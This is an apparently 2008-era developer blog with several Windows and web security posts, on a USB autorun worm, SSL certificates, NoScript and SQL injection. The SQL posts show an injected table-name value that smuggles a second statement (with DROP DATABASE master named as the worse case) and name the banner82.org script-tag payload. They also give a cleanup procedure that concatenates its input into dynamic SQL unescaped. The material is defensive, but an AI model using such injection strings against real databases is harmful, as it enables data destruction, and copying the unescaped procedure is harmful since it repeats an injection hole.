Suspected Trojan or Virus qxty9be.cmd

Suspected Trojan is messing up my PC at this very moment[more]

I attached my portable drive to a computer that didn't have antivirus
today. The computer was working fine (at least as it seems) but I found
a certain "autorun.inf" and "qxty9be.cmd" in that diks afterwards.

I scanned the disk and Symantec didn't see anything! However in my
attempt to learn more about it (thinking I could run the .cmd file
inside a Virtual Machine) I copied it to my local disk.

After copying I couldn't see the file (it was hidden but weirdly
enough I saw it when it was on my portable drive). So I went to Tools
> Folder Options > View > Show hidden files/folders.

That's when Auto Protect came up. It detected something! but
Auto-Protect Results froze. Stupid me tried to Scan the folder again
and Manual Scan froze again.

I didn't know copy/pasting without running could cause some unexpected behavior.

I had the same behavior on another PC earlier and it ended up to
have booting problems. If it was indeed the cause then it did something
really serious.

I couldn't find any resource about it in Google except one but no resolution whatsoever. And was posted yesterday or something.

Symantec Auto Protect results and Manual Scan window is still hanging
at this point actually. So it feels like this is a goodbye letter as I
expect something bad to happen once I restart this. (similar to what
happened earlier).

So this is just a warning and wish me luck (I have backups for sure but still things are never gonna be the same again…

UPDATE

Just restarted but unlike the other machine, this one survived. Thanks to the following

1) ZoneAlarm (the OSFirewall feature i think) – it prompted whether to allow the *.cmd to run or not (of course I denied it)

2) Spybot Search & Destroy – scanned and detected the Trojan as Win32.Ruju.a but only God (and the creator) knows what else it does

3) Acronis True Image backup – did a backup even during the time that Symantec was freezing (it might end up as corrupted backup but it's trivial to backup so did it anyway). Plus my previous backup gave me the confidence that worse comes to worse I have one

4) Symantec for auto protect. Not for protecting me but at least detecting the problem despite freezing. The trojan still managed to get thru. I'm certain of this cause clicking on my other drives was running the *.cmd file and Spybot affirms that the trojan made it's way. I also did a manual scan on the portable drive before this erupted and it didn't detect it. What's wrong Symantec (i have v10)

Hope that would be the last of it. Gotta get back to work

UPDATE 2

* This worm is generally transmitted via AutoRun features so it's always best to turn off that feature. GroupPolicy Editor (Start > Run > gpedit.msc> User Configuration > Administrative Templates > System > Turn Off Autoplay should be set to Enabled)

* Furthermore, here's more detailed information about the issue: http://www.threatexpert.com/report.aspx?md5=e24a0458c2ef5333b06be67c7ea47b95

Will keep updating this as necessary. Let's make the world a safer place…

WindowsPrincipal.IsInRole doesn’t reflect changes until restart

Just an observation sometime ago that if you create a new Windows Role and add a user to it and create a WindowsPrincipal using that user, the IsInRole method doesn't reflect the membership change made until a restart is made. [more]

For example, given the code below (Console Application project)

using System;

using System.Collections.Generic;

using System.Text;

using System.Security.Principal;

 

namespace WindowsPrincipalTest

{

    class Program

    {

        static void Main(string[] args)

        {

            WindowsIdentity ident = WindowsIdentity.GetCurrent();

            WindowsPrincipal principal = new WindowsPrincipal(ident);

            Console.WriteLine("IsAdmin = " + principal.IsInRole(WindowsBuiltInRole.Administrator));

            Console.WriteLine("IsCustomRole = " + principal.IsInRole("CustomRole"));

            Console.ReadKey();

        }

    }

}

assuming that you have no CustomRole when executing this code for the first time you see the following output

Then create a role named "CustomRole" (if not yet present) then add yourself (or the user which you will use to execute the sample code) as a member of that role.

I usually do this using ComputerManagement MMC (Start > Settings > Control Panel > Administrative Tools OR Start > Run > compmgmt.msc > OK) > System Tools > Local Users / Groups node.

After which, execute the code/application again and you should see the same output as above, IsCustomRole should still be false.

And you should notice that unless you restart your computer the membership change will not be reflected. (** just a reminder to make sure you save documents before restarting)

Lost Internet Access due to ZoneAlarm and Microsoft Update KB951748

I ran into this issue a while ago where I lost internet access connection after installing a windows update and turns out to be because of my ZoneAlarm installation. [more]

Overview:
Microsoft
Update KB951748
is known to cause loss of internet access for ZoneAlarm
users on Windows XP/2000. Windows Vista users are not affected.

Impact :
Sudden loss of internet access

Platforms Affected :
ZoneAlarm Free, ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Anti-Spyware, and ZoneAlarm Security Suite

Resolution: Basically

1) Download and Install latest version

2) ZoneAlarm Firewall Internet Zone to medium

3) Uninstall the windows update

Read the full article from here posted July 8, 2008

There are also mention in the forums about uninstalling and reinstalling but also a mention that it does expose some vulnerability in which the update was intended for.

 

The Microsoft Source Code Analyzer for SQL Injection tool

Microsoft released The Microsoft Source Code Analyzer for SQL Injection tool (for ASP code) is available to find SQL injection vulnerabilities [more]

The Microsoft Source Code Analyzer for SQL Injection tool is a static
code analysis tool that helps you find SQL injection vulnerabilities in
Active Server Pages (ASP) code. This article describes how to use the
tool, the warnings that are generated by the tool, and the limitations
of the tool. See the tool Readme document for more information.

Note that this is a static source code analyzer and thus must be run in the machine (IMHO, preferably not in production – though since it analyzes source code it is non intrusive) where the source code resides.

My Verisign SSL Certificate Application Experience

I do have an idea about SSL, certificates and related security concepts but in my previous works, it was someone else (client IT) who did the preparation, request and installation of SSL certificates until lately when I had to do it myself. I also had experience with trial and self signed certificates but still some things are not the same of course (including the risk of messing something up).

It's not as difficult as it sounds but want to share a few things. [more]

For those not so familiar with SSL, I would suggest google or wikipedia but since providers are working their best to get the highest rank for search engines you might not get the best explanations and the one for wikipedia seems too technical so the following article might help : What is SSL and what are certificates (used google to search for it too so there could be better ones) and here's something from Verising too: Secure Sockets Layer

With that out of the way the first step would be to generate a Certificate Signing Request (CSR) that will be used to apply to Verisign.

For CSR generation, go to the following link and select your server : Verisign : Generating a CSR request. In my case it was IIS 6.0 on Windows Server 2003.

Since the site had an existing certicate with another provider (not Verisign), I figured it wouldn't matter if I generate a renewal request (an option in IIS Server Certificates wizard) despite the new provider since it is the private key that matters and it's still in the machine so I generated the renewal request, initiated the registration, submitted the CSR (copy paste in their application wizard) and payment was succesful.

Now here's my first issue. Verisign wouldn't/can't process the application because the common name (CN) embedded/inside the CSR request does not match the company registered as the owner of the domain we are trying to secure the certificate for. Note that this was not an issue in the previous provider but Verisign is more particular on this (which is a good thing). So remember, the CN for the request must match the owner name registered for the domain. If that is not the case then they do offer the following options:

1) Update the registrant/owner information in the domain register to match the CN

2) Generate a new request with the matching CN and registrant

3) A domain authorization letter that must be signed by the domain registrant or the employee of the domain registrant (and NOT the organizational contact in the request).

So moving forward, our best option was option 2.

Now, you can't create a new request without removing the old attached certificate. Problem. But not for long because Microsoft has a work-around in the following link :  Renew/Create CSR while another certificate is still installed. Note that the title mentions Renew but how I just did it. Well if you'd notice the article it applies to IIS 5.0 and IIS 6.0 seems have been added the feature that you can renew without going thru the work-around. That is generating a renewal CSR wouldn't require that you remove the existing certificate. Since I need to create a new CSR then I did what was in the article. Had another existing unused website (note: website and not virtual directory) on that IIS so I didn't need to create a new website. Used that to generate the CSR, application to Verisign again.

Took some time and a number of follow ups before they were able to get back to us that they can't verify the technical telephone contact. That they can't find a publicly verifiable number for our client. So either:

1) A faxed copy of a recent telephone bill showing the Organization Name and telephone number

2) A notarized letter signed by the Organizational contact authorizing the technical contact to request/apply for the product/certificate.

The technical and organizational contact was the same in our case but we did send a notarized letter nevertheless. Hopeful but turned out that they won't accept the faxed copy of the letter with an embossed notary seal. They suggested to shade the seal, did resent via fax and email but no luck. The seal was local and not from the US and not so legible even with the hard copy so if they insist then created a new one.

After all hassle, finally got the request approved. Signed in to Verisign Certificate Center (you'd have the details when you registered the first time) and downloaded the keys. got the PKCS#7 certicate (with intermediate certificate authorities – CA) since it was the common one and it says unless you know what you need, use PKCS. And knowing that it had the intermediate CA information I went for it. Otherwise if you installed incorrectly without the intermediate CA when you needed to then the certificate would appear as invalid to the browser.

Saved the content of the certificate inside a *.cer file. Continued the work-around steps from the Microsoft link earlier, that is processed the pending request on the temporary (the other unused web site), certificate was installed only to be removed after wards. Note that this is the trick. The certficate was disassociated with the other web site but it was installed and the record remains in the machine for use in another website. So went the production website > properties > directory security > server certificate > replace cerficiate > find the certificate installed a while ago (take note of the serial number or the name if it's obvious), replace and finally your good to go. Verify the certificate by accessing from your browser (from another machine – not from the same server). Read the article again for the more details instructions if you're not that familiar yet.

Verisign costs more than others but I'd still go for it if I/client can afford it despite this experience. But I would highly2x suggest that if you have renew a certificate especially if moving providers, make sure you do it way earlier than the existing certificates expiration (~ a month) to cover unexpected issues.

And we're done. Gotta sleep. 🙂

Privacy in sending email to mailing list (BCC)

I think most people should know this already although I'm not quite sure about that so posting anyways.

Most often than not I receive emails being sent to mailing lists where the the individual recipients don't really know each other or even if they do they might not necessarily want the other recipients of their existing email address. I personally don't really mind disclosing my information (as having my blog and numerous online profiles would easily help you figure out my email) but there is a very high possibility that others would actually mind doing such and unless you are absolutely sure that they don't then use BCC (blind carbon copy) for those email recipients instead. [more]

Don't get me wrong, this is a free world and do as you please but your recipients will likely appreciate proper use of the BCC field and not to mention that it would minimize spam. In it's own little way make the web and the world a safer place. we need not worry about black hat hackers employing complicated techniques to look into email address databases or gain access to a server if they'd need only to compromise a few email account and if those accounts happen to be full of valid mailing lists emails, then they're out for a treat. We don't really want that do we 🙂

In the context of e-mail, blind carbon copy (abbreviated BCC and sometimes referred to as Blind Courtesy Copy)
refers to the practice of sending a message to multiple recipients in
such a way that what they receive does not contain the complete list of
recipients…
Read full article about
BCC on Wikipedia 

Browsing Security with NoScript

While working (or actually just playing around) with the infamous SQL injection attacks seen around lately I think it should be worth mentioning that being a developer browser and your own PCs security security is also important  or as important as securing your web servers and databases. [more]

Since the some (most) of the variants of it involves a javascript file which in turn creates an iframe which communicates with another server to serve whatever malicious things they want to happen in the background (I didn't really bother knowing what it was doing rather just how to help get rid or prevent them) I think it is worth mentioning that simply opening those compromised pages could break your own browser or machine too and even make you a accomplice in their deeds. Since it's not uncommon for developers to be developing using admin accounts we are more susceptible than typical non power users **. That's where NoScript for Firefox comes in. Lot of reviews and arguments versus Firefox and IE security but I find it hard to block javascripts in IE and besides I've been very satisfied with Firefox NoScript (though my doors are never open).

For those of you who haven't heard NoScript before it's a Firefox add-in which allows you to allow, deny permanently or temporarily javascripts/java/flash among other objects for web sites that you open. And could be found in the following link : NoScript homepage. It's developed by Giorgio Maone which if I may say is doing a good job in continually improving this stuff. (getting new releases very often).

So there, do yourself and the world a favor and read about your browser's security and at least know how to filter javascript. Every browser that is a little more secured is a step towards a safer web.

** yes i know, no-admin and least privilege stuff – but let's face it, not
everyone had been succesful in completely following those. I'm guilty of this but yes I'm getting there plus not to mention what's my purchased Acronis True Image is for 🙂 Hopefully more post on this topic next
time.

sp_executesql error with DDL statements (preventing SQL injection)

One of the requirement for an application I'm currently
working on is for the end user of a web application/site to be able to create
objects in the database.

There are a number of objects that must be created or
manipulated but for the sake of simplicity let's take for example creating a table with one
column. The SQL statement would look like:

CREATE TABLE [MyTable]
( [MyColumn] INT NOT NULL )

To minimize SQL injection, I was hoping I could use the sp_executesql stored procedure to come up with a
parameterized query (in addition to other preventive measures like validating input). Something like:

DECLARE @SQLString NVARCHAR(MAX);
DECLARE @ParamDefinition NVARCHAR(256);

SET @SQLString =
  N'CREATE
TABLE @TableName (@ColumnName INT NOT NULL)';
SET
@ParamDefinition =
  N'@TableName VARCHAR(128),
@ColumnName VARCHAR(128)';

EXECUTE sp_executesql
 
@SQLString,
  @ParamDefinition,
  @TableName = 'MyTable',
 
@ColumnName = 'MyColumn';

When I executed the statement it returned an error
"Incorrect syntax near
'@TableName'
". Though I haven't worked with sp_executesql with
Data Definition Language (DDL) statements I have been using it for Data
Manipulation Language (DML) statements such as conditional selects and others so
I'm quite sure there is nothing wrong with syntax near @TableName by itself.
What could be wrong?[more]

It turns out that using sp_executesql with DDL
statements are not supported.

So in this particular case, to minimize SQL injection
you have to use concatenation to dynamically build the SQL statement.

DECLARE @SQLString NVARCHAR(MAX)
DECLARE @TableName VARCHAR(128)
DECLARE @ColumnName VARCHAR(128)
SET @TableName = 'MyTable'
SET
@ColumnName = 'MyColumn'
SET @SQLString =
 'CREATE TABLE ' + @TableName + '( ' + @ColumnName + ' INT
NOT NULL)'
EXEC (@SQLString)

But wait, there is something else you can do to prevent
SQL injection so all is not really hopeless. Meet QUOTENAME. As you might have noticed before,
one way to create a table with spaces in the name is using quotes or brackets
like CREATE TABLE [hello world how are you]. So anything between the delimiter
(eg. quote, brackets) are considered part of the TableName rather than a
command/statement.

When you experiment more you will notice that the
following statement will create a table named as indicated instead throwing an
error or doing something messy: 

CREATE TABLE [Hello; Drop Master; ] ( [MyColumn] INT NOT
NULL)

Yes I know that's a very clever sql injection attempt
but here's another example:

DECLARE @SQLString NVARCHAR(MAX)
DECLARE @TableName VARCHAR(128)
DECLARE @ColumnName VARCHAR(128)
SET @TableName = 'MyTable (ColA INT NULL); PRINT ''HELLO'';
— '
SET @ColumnName = 'MyColumn'
SET @SQLString =
 'CREATE TABLE '
+ @TableName + '( ' + @ColumnName + ' INT NOT NULL)'
PRINT (@SQLString)

Try executing that in your table and
along with creating the table named MyTable you will see HELLO printed in the
output/messages window. If you replace the print statement with a more
maliciously statement such as  DROP DATABASE master and you happen to be running
a highly privileged account then you're in trouble.

But try the statement again but this
time using this @SQLString:

SET @SQLString =
 'CREATE TABLE ' + QUOTENAME(@TableName) + '( ' +
QUOTENAME(@ColumnName) + ' INT NOT NULL)'

As you might have expected you should get a
table named [MyTable (ColA INT NULL); PRINT 'HELLO'; — ] instead of HELLO being
printed. Should there be a '[' or ']' in your variable value, it will be changed
to '[[' and ']]' respectively just like how single quotes are changed to two
single quotes to avoid issues.

Now that's seems a lot better.

So in addition to other ways of
protecting your database such as (but not limited to) validating input (very
well), running least privileged SQL server account, using stored procedures
(along with determining proper parameter data type and length) when faced with
the need to perform dynamic queries where you cannot use sp_executesql like in this case with DDL
statements, see if QUOTENAME would be
applicable and if it would help.

** note that QUOTENAME(dbo.Employee)
will not result to [dbo].[Employee] but rather [dbo.Employee] so for fully
qualified names, quote the server/database/schema and table names
respectively.

SQL injection attacks – banner82 script


UPDATE (6/19/2008)
: For both IT people and end users please spend time reading through (if
not here then at least from other sites, just be sure you are aware
nevertheless) if you aren't that aware yet since this exploit has been
continually spreading despite numerous warnings already made in the
web. For developers, please feel free to comment, add or correct any information you think would further benefit others. For end users, I would still recommend knowing about more about this issue, how to protect yourself and stop yourself from being part of spreading it. Link to the following section might be of interest to you : browser and anti spy software

UPDATE (6/27/2008) : Came across Scrawlr an SQL Injection Detection Tool from HP that is available for free. There probably are other tools available (better) but this is the one I ran into so far. Also a tool named UrlScan from Microsoft TechNet was suggested by Jax (see comments). It can be used to screen/limit request information being sent to your site, the same way that http.sys does for IIS6 or later. You want to have a look.

There seems to be a number of SQL injection attacks happening lately involving adding of <script with banner82.org/b.js, adword71.com/b.js (and the likes ) to entries under string/text/varchar columns in the database targetting ASP (classic/3.0) sites and SQL Server. Note, they need not know your table or column names to mess up with you.

I definitely do not wish to play cops and robbers here but I wish to contribute a little on this. There are a number of articles on this (read along) and even more for preventing/cleaning
SQL injection
and other related exploits such as cross-site scripting so help yourself. 😀 [more]

It generally works by appending a string/text (url-encoded SQL script) to the URL/query string, then when it gets to the server, such string/text will be url decoded (automatically) and if the target site/application is susceptible to SQL injection (generally by concatenating and dynamically building the SQL query) then the passed SQL script will unknowingly be executed against the database and will cause some text to be appended to string/text fields. This is not limited to insert/update operations made against the database but also for SELECT (ie. even if your site/application only involves SELECT queries but not coded to prevent this, it will still be vulnerable).

I'm almost sure other variants will popup here and there (those who did are IMHO brilliant doesn't change the fact of course that what they're doing is wrong) but I think being aware is more than a good start. 

Here are more information on the issue and an SQL script to help cleanse the affected data. You can run it against your SQL Server database as it is but I would recommend you seek the help of at least a developer with SQL knowledge. Also please feel free to drop me a message/email if necessary. I'd be glad to help any way I can.

/*
NOTE: this is a patch created only by reversing the effect of the SQL script
in one known variant of the exploit. This is not tested as a generic RemoveText stored procedure.

Also use with caution as this procedure will remove the text specified without further checks
as to whether it is indeed an exploit or valid data. (eg. you are applying this to a forum
database which may contain valid entries with the <script string/text… they will be removed unconditionally)

Always backup up your database before any patches, and verify data after patch.
There is also no guarantee that this will completely remove the unwanted text if the variant
used for the exploit uses another approach (such as those involving NTEXT, TEXT columns).

Finally, this is only to cleanse already compromised data and doesn't prevent SQL injection.
There are many articles doing that already but to point out a few, please check these links
http://www.experts-exchange.com/Security/Vulnerabilities/Q_23411125.html
http://www.experts-exchange.com/Security/Vulnerabilities/Q_23408074.html

Short solutions could involve (short and long term):
1. changes in code to validate input (deny request variables with blacklisted keywords)
2. this (cleansing of data)
3. reduce access of the database user account to only those necessary to perform what's needed. See DENY keyword in SQL.

    – generally DENY access to system tables, view, procedures et al and allow only
     access to user defined objects. For this particular variant it DENY sysobjects and syscolumns table in SQL 2000 (views in SQL 2005) but if you can all system/unused/objects neet not be accessed directly the better  
   – this might take time to properly test which needs to be allowed and thus might require
     testing the whole site again (regression testing) but in typical applications restricting access
     to system would not be a problem good idea.
4. more input validation (length validation, data type validation etc)
5. use stored procedures or parameterized queries (if there is really a need to concatenate)
6. auditing, logging and maybe maintain a blacklist of IPs
7. just a reminder, make sure the web server and database server is secured ofcourse
8. subscribe to hacker safe or similar services

also don't fail to encrypt critical/sensitive information in the database

There is are more comprehensive articles in the web so please take some time to research and
don't just take my word for it.

Hope this helps.

*/

IF EXISTS (
  SELECT * FROM dbo.sysobjects
    WHERE
      ID = OBJECT_ID(N'[dbo].[RemoveText]')
      AND type in (N'P', N'PC'))
DROP PROCEDURE [dbo].[RemoveText]

GO

CREATE PROC RemoveText
(
  @TextToRemove VARCHAR(4000)
)

AS

DECLARE @T VARCHAR(255),
@C VARCHAR(255)
DECLARE Table_Cursor CURSOR
FOR
  SELECT a.name,b.name
  FROM sysobjects a,syscolumns b
    WHERE a.id=b.id
      AND a.xtype='u'
      AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)

OPEN Table_Cursor
  FETCH NEXT FROM Table_Cursor
  INTO @T,@C WHILE(@@FETCH_STATUS=0)

BEGIN
  EXEC(
    'UPDATE ['+@T+']
    SET ['+@C+']=REPLACE(CONVERT(VARCHAR(4000), ['+@C+']), ''' + @TextToRemove  + ''', '''')')
  FETCH NEXT FROM Table_Cursor INTO @T,@C
  END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor

GO

/*


Sample USAGE (see below)
Also replace accordingly. There are exploits which involves a different
.js path (like banner82.com or adword71 et al)

*/

EXEC RemoveText '<script src=[x]></script>'
— WHERE [x] is a URL/link to a .js and may vary depending on what hit your site  

UPDATE (6/19/2008) I would highly recommend securing you browsers using javascript/java/flash etc blockers, adware and spybot protection in place. I had a recent post about Firefox and NoScript in the following link: Browsing Security with NoScript. The security of being able to block javascript is significant. There are only a number of domain/sites that the add-in recognizes in it's white list so even javascript from the site itself is blocked (you can allow it easily) so how much more hidden javascript from 3rd party sites (such as what is seen in this exploit).

Also look into antispy products like Spybot Search & Destroy which would prevent you from accessing known blacklisted domains among other things. It update automatically though but if you "immunize" very often, you're increasing the chances of not running into malicious site. Others include the free Windows Defender for genuine windows users, adaware which offers real time protection (though haven't been very succesful with this one) and it might also be time to look into getting a Personal Firewalls such as ZoneAlarm Personal Firewall or you might even want to get professional editions of that which you want for added protection.

Other References:

MUST READ: SQL Injection from Microsoft Security Vulnerability Research and Defense Blog

MUST READ: Security Development Lifecycle post on SQL injection (Michael Howard)

Information on these autmated attacks from SANS Internet Storm Center


ZDNet on Fast-Fluxing SQL injection attacks executed from the Asprox botnet
(directly related to this exploit)

Filtering SQL injection from Classic ASP – (** restricting access to the objects being exploit such as sysobjects/syscolumns seems like the quickest solution but feel free to explore this too – note though that IMHO this will have a performance hit on your site)

A more generic Search and Replace script

Link: Recent SQL Injection Attacks

I figured this would be a good reminder. I've known some people who would have thought just because they create client side validators and use stored procedures they are no longer vulnerable to SQL injection attacks. Ready the full article from the link below and it will contain links on how to protect yourself from such attacks too.

You may have seen recent reports
that have surfaced stating that web sites running on Microsoft’s
Internet Information Services (IIS) 6.0 have been compromised. These
reports allude to a possible vulnerability in IIS or issues related to Security Advisory 951306 which was released last week.

Full article : SQL Injection Attacks on IIS Web Servers – BillS IIS Blog